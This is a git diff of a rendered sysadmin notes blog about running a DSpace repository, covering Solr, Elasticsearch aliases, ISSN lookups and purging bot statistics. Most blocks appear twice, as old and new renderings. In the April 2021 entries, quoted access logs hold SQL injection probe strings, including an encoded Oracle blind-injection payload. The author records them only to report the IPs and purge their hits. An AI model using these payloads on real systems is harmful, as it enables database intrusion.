</span></span><span style="display:flex;"><span>Run 1 —  52% — 2,500/4,824 docs — 2s — 4m 50s
</span></span><span style="display:flex;"><span>Run 1 —  54% — 2,600/4,824 docs — 2s — 4m 53s
</span></span><span style="display:flex;"><span>Run 1 —  56% — 2,700/4,824 docs — 2s — 4m 55s
</span></span><span style="display:flex;"><span>Run 1 —  58% — 2,800/4,824 docs — 2s — 4m 58s
</span></span><span style="display:flex;"><span>Run 1 —  60% — 2,900/4,824 docs — 2s — 5m 1s
</span></span><span style="display:flex;"><span>Run 1 —  62% — 3,000/4,824 docs — 2s — 5m 3s
</span></span><span style="display:flex;"><span>Run 1 —  64% — 3,100/4,824 docs — 2s — 5m 6s
</span></span><span style="display:flex;"><span>Run 1 —  66% — 3,200/4,824 docs — 3s — 5m 9s
</span></span><span style="display:flex;"><span>Run 1 —  68% — 3,300/4,824 docs — 2s — 5m 12s
</span></span><span style="display:flex;"><span>Run 1 —  70% — 3,400/4,824 docs — 2s — 5m 14s
</span></span><span style="display:flex;"><span>Run 1 —  73% — 3,500/4,824 docs — 2s — 5m 17s
</span></span><span style="display:flex;"><span>Run 1 —  75% — 3,600/4,824 docs — 2s — 5m 20s
</span></span><span style="display:flex;"><span>Run 1 —  77% — 3,700/4,824 docs — 2s — 5m 22s
</span></span><span style="display:flex;"><span>Run 1 —  79% — 3,800/4,824 docs — 2s — 5m 25s
</span></span><span style="display:flex;"><span>Run 1 —  81% — 3,900/4,824 docs — 2s — 5m 27s
</span></span><span style="display:flex;"><span>Run 1 —  83% — 4,000/4,824 docs — 2s — 5m 30s
</span></span><span style="display:flex;"><span>Run 1 —  85% — 4,100/4,824 docs — 2s — 5m 33s
</span></span><span style="display:flex;"><span>Run 1 —  87% — 4,200/4,824 docs — 2s — 5m 35s
</span></span><span style="display:flex;"><span>Run 1 —  89% — 4,300/4,824 docs — 2s — 5m 38s
</span></span><span style="display:flex;"><span>Run 1 —  91% — 4,400/4,824 docs — 2s — 5m 41s
</span></span><span style="display:flex;"><span>Run 1 —  93% — 4,500/4,824 docs — 2s — 5m 43s
</span></span><span style="display:flex;"><span>Run 1 —  95% — 4,600/4,824 docs — 2s — 5m 46s
</span></span><span style="display:flex;"><span>Run 1 —  97% — 4,700/4,824 docs — 2s — 5m 49s
</span></span><span style="display:flex;"><span>Run 1 — 100% — 4,800/4,824 docs — 2s — 5m 51s
</span></span><span style="display:flex;"><span>Run 1 — 100% — 4,824/4,824 docs — 2s — 5m 53s
</span></span><span style="display:flex;"><span>Run 1 took 5m 53s
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>**************************
</span></span><span style="display:flex;"><span>* Update Script Finished *
</span></span><span style="display:flex;"><span>**************************
</span></span></code></pre></div><ul>
<li>If I run it again it finds the same 4,824 docs and processes them&hellip;
<ul>
<li>I asked Atmire for feedback on this: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839</a></li>
@ -796,8 +796,8 @@ Run 1 took 5m 53s
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">2021-03-29 08:55:40,073 INFO org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={q=Gender+mainstreaming+in+local+potato+seed+system+in+Georgia&amp;fl=handle,search.resourcetype,search.resourceid,search.uniqueid&amp;start=0&amp;fq=NOT(withdrawn:true)&amp;fq=NOT(discoverable:false)&amp;fq=-location:l5308ea39-7c65-401b-890b-c2b93dad649a&amp;wt=javabin&amp;version=2} hits=143 status=0 QTime=0
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-03-29 08:55:40,073 INFO org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={q=Gender+mainstreaming+in+local+potato+seed+system+in+Georgia&amp;fl=handle,search.resourcetype,search.resourceid,search.uniqueid&amp;start=0&amp;fq=NOT(withdrawn:true)&amp;fq=NOT(discoverable:false)&amp;fq=-location:l5308ea39-7c65-401b-890b-c2b93dad649a&amp;wt=javabin&amp;version=2} hits=143 status=0 QTime=0
</span></span></code></pre></div><ul>
<li>But the item mapper only displays ten items, with no pagination
<ul>
<li>There is no way to search by handle or ID</li>
@ -836,18 +836,18 @@ Run 1 took 5m 53s
</ul>
</li>
</ul>
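<ul>
<li>Querying the Solr search core directly by handle does work, though, reusing the same fields as the logged query above (hypothetical handle; adjust the Solr host and port):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s -G <span style="color:#e6db74">&#39;http://localhost:8081/solr/search/select&#39;</span> --data-urlencode <span style="color:#e6db74">&#39;q=handle:&#34;10568/12345&#34;&#39;</span> --data-urlencode <span style="color:#e6db74">&#39;fl=handle,search.resourcetype,search.resourceid&#39;</span> --data-urlencode <span style="color:#e6db74">&#39;wt=json&#39;</span>
</span></span></code></pre></div>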
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#f92672">import</span> requests
query_params <span style="color:#f92672">=</span> {<span style="color:#e6db74">&#39;item-type&#39;</span>: <span style="color:#e6db74">&#39;publication&#39;</span>, <span style="color:#e6db74">&#39;format&#39;</span>: <span style="color:#e6db74">&#39;Json&#39;</span>, <span style="color:#e6db74">&#39;limit&#39;</span>: <span style="color:#ae81ff">10</span>, <span style="color:#e6db74">&#39;offset&#39;</span>: <span style="color:#ae81ff">0</span>, <span style="color:#e6db74">&#39;api-key&#39;</span>: <span style="color:#e6db74">&#39;blahhhahahah&#39;</span>, <span style="color:#e6db74">&#39;filter&#39;</span>: <span style="color:#e6db74">&#39;[[&#34;issn&#34;,&#34;equals&#34;,&#34;0011-183X&#34;]]&#39;</span>}
r <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(<span style="color:#e6db74">&#39;https://v2.sherpa.ac.uk/cgi/retrieve&#39;</span>)
<span style="color:#66d9ef">if</span> r<span style="color:#f92672">.</span>status_code <span style="color:#f92672">and</span> len(r<span style="color:#f92672">.</span>json()[<span style="color:#e6db74">&#39;items&#39;</span>]) <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0</span>:
r<span style="color:#f92672">.</span>json()[<span style="color:#e6db74">&#39;items&#39;</span>][<span style="color:#ae81ff">0</span>][<span style="color:#e6db74">&#39;title&#39;</span>][<span style="color:#ae81ff">0</span>][<span style="color:#e6db74">&#39;title&#39;</span>]
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> requests
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>query_params <span style="color:#f92672">=</span> {<span style="color:#e6db74">&#39;item-type&#39;</span>: <span style="color:#e6db74">&#39;publication&#39;</span>, <span style="color:#e6db74">&#39;format&#39;</span>: <span style="color:#e6db74">&#39;Json&#39;</span>, <span style="color:#e6db74">&#39;limit&#39;</span>: <span style="color:#ae81ff">10</span>, <span style="color:#e6db74">&#39;offset&#39;</span>: <span style="color:#ae81ff">0</span>, <span style="color:#e6db74">&#39;api-key&#39;</span>: <span style="color:#e6db74">&#39;blahhhahahah&#39;</span>, <span style="color:#e6db74">&#39;filter&#39;</span>: <span style="color:#e6db74">&#39;[[&#34;issn&#34;,&#34;equals&#34;,&#34;0011-183X&#34;]]&#39;</span>}
</span></span><span style="display:flex;"><span>r <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(<span style="color:#e6db74">&#39;https://v2.sherpa.ac.uk/cgi/retrieve&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> r<span style="color:#f92672">.</span>status_code <span style="color:#f92672">and</span> len(r<span style="color:#f92672">.</span>json()[<span style="color:#e6db74">&#39;items&#39;</span>]) <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0</span>:
</span></span><span style="display:flex;"><span> r<span style="color:#f92672">.</span>json()[<span style="color:#e6db74">&#39;items&#39;</span>][<span style="color:#ae81ff">0</span>][<span style="color:#e6db74">&#39;title&#39;</span>][<span style="color:#ae81ff">0</span>][<span style="color:#e6db74">&#39;title&#39;</span>]
</span></span></code></pre></div><ul>
<li>I exported a list of all our ISSNs from CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=253) to /tmp/2021-03-31-issns.csv;
COPY 3081
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=253) to /tmp/2021-03-31-issns.csv;
</span></span><span style="display:flex;"><span>COPY 3081
</span></span></code></pre></div><ul>
<li>I wrote a script to check the ISSNs against Crossref&rsquo;s API: <code>crossref-issn-lookup.py</code>
<ul>
<li>I suspect Crossref might have better data actually&hellip;</li>
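</ul>
</li>
<li>For spot-checking a single ISSN, Crossref&rsquo;s journals endpoint can be queried directly, e.g. with the ISSN from the Sherpa example above:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;https://api.crossref.org/journals/0011-183X&#39;</span> | python -m json.tool
</span></span></code></pre></div>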

File diff suppressed because it is too large

@ -36,7 +36,7 @@ I looked at the top user agents and IPs in the Solr statistics for last month an
I will add the RI/1.0 pattern to our DSpace agents overrides and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&hellip; as that&rsquo;s an actual user&hellip;
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -147,17 +147,17 @@ I will add the RI/1.0 pattern to our DSpace agents overload and purge them from
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">193.169.254.178 - - [21/Apr/2021:01:59:01 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata\x22%20and%20\x2221\x22=\x2221 HTTP/1.1&#34; 400 5 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata-21%2B21*01 HTTP/1.1&#34; 200 458201 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata&#39;||lower(&#39;&#39;)||&#39; HTTP/1.1&#34; 400 5 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
193.169.254.178 - - [21/Apr/2021:02:02:10 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata&#39;%2Brtrim(&#39;&#39;)%2B&#39; HTTP/1.1&#34; 200 458209 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>193.169.254.178 - - [21/Apr/2021:01:59:01 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata\x22%20and%20\x2221\x22=\x2221 HTTP/1.1&#34; 400 5 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
</span></span><span style="display:flex;"><span>193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata-21%2B21*01 HTTP/1.1&#34; 200 458201 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
</span></span><span style="display:flex;"><span>193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata&#39;||lower(&#39;&#39;)||&#39; HTTP/1.1&#34; 400 5 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
</span></span><span style="display:flex;"><span>193.169.254.178 - - [21/Apr/2021:02:02:10 +0200] &#34;GET /rest/collections/1179/items?limit=812&amp;expand=metadata&#39;%2Brtrim(&#39;&#39;)%2B&#39; HTTP/1.1&#34; 200 458209 &#34;-&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)&#34;
</span></span></code></pre></div><ul>
<li>I will report the IP on abuseipdb.com and purge their hits from Solr</li>
<li>The second IP is in Colombia and is making thousands of requests for what looks like some test site:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">181.62.166.177 - - [20/Apr/2021:22:48:42 +0200] &#34;GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0&#34; 200 123613 &#34;http://cassavalighthousetest.org/&#34; &#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36&#34;
181.62.166.177 - - [20/Apr/2021:22:55:39 +0200] &#34;GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0&#34; 200 123613 &#34;http://cassavalighthousetest.org/&#34; &#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>181.62.166.177 - - [20/Apr/2021:22:48:42 +0200] &#34;GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0&#34; 200 123613 &#34;http://cassavalighthousetest.org/&#34; &#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36&#34;
</span></span><span style="display:flex;"><span>181.62.166.177 - - [20/Apr/2021:22:55:39 +0200] &#34;GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0&#34; 200 123613 &#34;http://cassavalighthousetest.org/&#34; &#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36&#34;
</span></span></code></pre></div><ul>
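<li>A quick DNS lookup shows whether the referrer&rsquo;s domain even resolves:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ host cassavalighthousetest.org
</span></span></code></pre></div><ul>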
<li>But this site does not exist (yet?)
<ul>
<li>I will purge them from Solr</li>
@ -165,46 +165,46 @@ I will add the RI/1.0 pattern to our DSpace agents overload and purge them from
</li>
<li>The third IP is in Russia apparently, and the user agent has the <code>pl-PL</code> locale with thousands of requests like this:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">45.146.166.180 - - [18/Apr/2021:16:28:44 +0200] &#34;GET /bitstream/handle/10947/4153/.AAS%202014%20Annual%20Report.pdf?sequence=1%22%29%29%20AND%201691%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281691%3D1691%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%29%20AND%20%28%28%22RKbp%22%3D%22RKbp&amp;isAllowed=y HTTP/1.1&#34; 200 918998 &#34;http://cgspace.cgiar.org:80/bitstream/handle/10947/4153/.AAS 2014 Annual Report.pdf&#34; &#34;Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>45.146.166.180 - - [18/Apr/2021:16:28:44 +0200] &#34;GET /bitstream/handle/10947/4153/.AAS%202014%20Annual%20Report.pdf?sequence=1%22%29%29%20AND%201691%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281691%3D1691%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%29%20AND%20%28%28%22RKbp%22%3D%22RKbp&amp;isAllowed=y HTTP/1.1&#34; 200 918998 &#34;http://cgspace.cgiar.org:80/bitstream/handle/10947/4153/.AAS 2014 Annual Report.pdf&#34; &#34;Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15&#34;
</span></span></code></pre></div><ul>
<li>I will purge these all with my <code>check-spider-ip-hits.sh</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 21648 hits from 193.169.254.178 in statistics
Purging 20323 hits from 181.62.166.177 in statistics
Purging 19376 hits from 45.146.166.180 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 61347
</code></pre></div><h2 id="2021-05-02">2021-05-02</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
</span></span><span style="display:flex;"><span>Purging 21648 hits from 193.169.254.178 in statistics
</span></span><span style="display:flex;"><span>Purging 20323 hits from 181.62.166.177 in statistics
</span></span><span style="display:flex;"><span>Purging 19376 hits from 45.146.166.180 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 61347
</span></span></code></pre></div><h2 id="2021-05-02">2021-05-02</h2>
<ul>
<li>Check the AReS Harvester indexes:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
yellow open openrxv-items-temp H-CGsyyLTaqAj6-nKXZ-7w 1 1 0 0 283b 283b
yellow open openrxv-items-final ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0 254mb 254mb
$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
...
&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
},
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp H-CGsyyLTaqAj6-nKXZ-7w 1 1 0 0 283b 283b
</span></span><span style="display:flex;"><span>yellow open openrxv-items-final ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0 254mb 254mb
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> },
</span></span></code></pre></div><ul>
<li>I think they look OK (<code>openrxv-items</code> is an alias of <code>openrxv-items-final</code>), but I took a backup just in case:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</span></span></code></pre></div><ul>
<li>Then I started an indexing in the AReS Explorer admin dashboard</li>
<li>The indexing finished, but it looks like the aliases are messed up again:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
yellow open openrxv-items-temp H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0 2.2mb 2.2mb
</code></pre></div><h2 id="2021-05-05">2021-05-05</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
</span></span><span style="display:flex;"><span>yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0 2.2mb 2.2mb
</span></span></code></pre></div><h2 id="2021-05-05">2021-05-05</h2>
<ul>
<li>Peter noticed that we no longer display <code>cg.link.reference</code> on the item view
<ul>
@ -229,9 +229,9 @@ yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time ~/dspace64/bin/dspace index-discovery -b
~/dspace64/bin/dspace index-discovery -b 4053.24s user 53.17s system 38% cpu 2:58:53.83 total
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time ~/dspace64/bin/dspace index-discovery -b
</span></span><span style="display:flex;"><span>~/dspace64/bin/dspace index-discovery -b 4053.24s user 53.17s system 38% cpu 2:58:53.83 total
</span></span></code></pre></div><ul>
<li>Nope! Still slow, and still no mapped item&hellip;
<ul>
<li>I even tried unmapping it from all collections, and adding it to a single new owning collection&hellip;</li>
@ -244,53 +244,53 @@ yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0
</li>
<li>The indexes on AReS Explorer are messed up after last week&rsquo;s harvesting:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
yellow open openrxv-items-temp H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0 2.2mb 2.2mb
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
...
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
</span></span><span style="display:flex;"><span>yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0 2.2mb 2.2mb
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> }
</span></span></code></pre></div><ul>
<li><code>openrxv-items</code> should be an alias of <code>openrxv-items-final</code>&hellip;</li>
<li>I made a backup of the temp index and then started indexing on the AReS Explorer admin dashboard:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-temp-backup
